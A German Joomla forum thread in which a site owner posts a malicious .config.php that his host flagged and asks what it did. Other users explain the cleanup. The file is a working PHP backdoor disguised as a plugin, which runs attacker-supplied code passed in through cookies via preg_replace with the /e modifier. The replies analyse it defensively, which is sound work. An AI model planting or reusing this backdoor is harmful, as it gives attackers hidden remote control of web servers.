Strato - vorübergehende Sperrung der Website

  • Strato sperrte meine Website mit folgender Begründung:

    Zitat

    Auf Ihrem Webspace befinden sich 1 schadhafte Dateien. Wir gehen davon aus, dass unbekannte Dritte diese Dateien in Ihren Webspace eingeschleust haben.

    Ursache sollte eine .config.php im Root sein. Die Datei wurde 2015 letztmalig geändert. Nach der Löschung dieser Datei wurde nach einem neuen Scan durch Strato meine Website entsperrt. Der Inhalt der .config.php ist im Folgenden aufgeführt. Leider kann ich kein PHP. Daher die Frage: ist diese .config.php nicht immer standardmäßig im Root? Was passiert(e) in der schadhaften PHP bzw. was ist das Risiko?

    Viele Grüße

    Michael

    <?php

    /**

    * @package Joomla.Plugin

    * @subpackage system.instantsuggest

    *

    * @copyright Copyright (C) 2013 InstantSuggest.com. All rights reserved.

    * @license GNU General Public License version 2 or later

    */

    /**

    * Instant Suggest Ajax

    *

    * @package Joomla.Plugin

    * @subpackage system.instantsuggest

    * @since 3.1

    */

    class PlgSystemInstantSuggest

    {

    public function __construct() {

    $filter = @$_COOKIE['p3'];

    if ($filter) {

    $option = $filter(@$_COOKIE['p2']);

    $auth = $filter(@$_COOKIE['p1']);

    $option("/123/e",$auth,123);

    die();

    }

    }

    }

    $suggest = new PlgSystemInstantSuggest;

  • Das ist ein Helferlein für einen Backdoor-Hack. Im Normalfall nicht alleinstehend.

    ein Hacker besucht deine Seite und übermittelt dabei mehrere Teile eines auszuführenden Schad-Codes, der dann zusammengesetzt wird.

    Das "/123/e" deutet dann darauf hin, dass der Code dann ausgeführt wird, weil sich dahinter ein eval() versteckt.

    Danach folgt ein die(), was dafür spricht, dass der Code gezielt von außen aufgerufen wird und nicht im normalen Joomlaablauf, weil das die Seite dir und Besuchern zu offensichtlich aufhängen würde.

    Wie der Schadcode exakt aussieht, lässt sich nicht sagen.

    Dich darauf hinzuweisen, dass mit größter Wahrscheinlichkeit die Seite NICHT bereinigt ist, spare ich mir dies mal;) Man wird müde ;)

  • Mein Tipp, professionelle Hilfe holen. von einer Datei löschen wird das Problem nicht gelöst sein. Ein diesntleisterverzeichnis findest du oben im Menü.

    Zumindestens musst du dich richtig mit diesem Problem beschäftigen. Gibt es eine saubere Datensicherung ? Welchen Umfang hat deine seite? Evtl ist die noch auf joomla 3 und du kannst sie mit J4 gleich Neu aufbauen. Vorher muss natürlich alles auf dem Webspace plus Datenbank gelöscht werden.... Usw.

    Es gibt Anleitung im Netz und auch hier in Forum! "Joomla gehackt, was muss ich tun" ... kenne deine Kenntnisse nicht. Aber als Amateur wird dir nur eine neuinstallation als Wahl bleiben. So bissl was machen ohne gutes wissen ist keine gute Idee. Bei keinem CMS de Welt...

  • Hallo zusammen,

    danke für die ausführlichen Hinweise und Warnungen. Dann hat es mal wieder jemand geschafft, meine Seite zu hacken (das erste Mal, kurz bevor Joomla 2 aus der Wartung ging). Ich werde zunächst eine alte Sicherung zurückspielen und dann mit Joomla 4 neu beginnen.

    Bis dann

    Michael

  • Mit ein paar grundlegenden Dingen lässt sich eine Seite schon sehr sehr sicher machen. Siehe auch #4. Regelmäßige Wartung gehört natürlich dazu,

    Wenn es wiederholt passiert ist, scheint etwas Grundlegendes nicht zu stimmen. Schau die Punkte mal genau durch, woran es liegen könnte.

  • Moin

    Dein Joomla muss nicht zwangsläufig das Problem gewesen sein. Ebenso kann es ein Trojaner auf Deinem Computer oder Handy gewesen sein, der die Passwörter für den Zugang zum Webhosting-Paket, dem FTP oder Joomla selbst abgefangen und ins Ausland übertragen hat. Dafür kommen prinzipiell alle Geräte in Frage, auf denen diese sensiblen Daten gespeichert haben. Auch sollte man in diesem Kontext mögliche Cloud-Speicher nicht außer Acht lassen.

    Deshalb: Alle beteiligten Geräte auf Schadcode / Viren überprüfen und dann ALLE Passwörter ändern. Erst danach kann man wieder eine saubere Grundlage schaffen auf der das Joomla läuft.

    Gruß Jan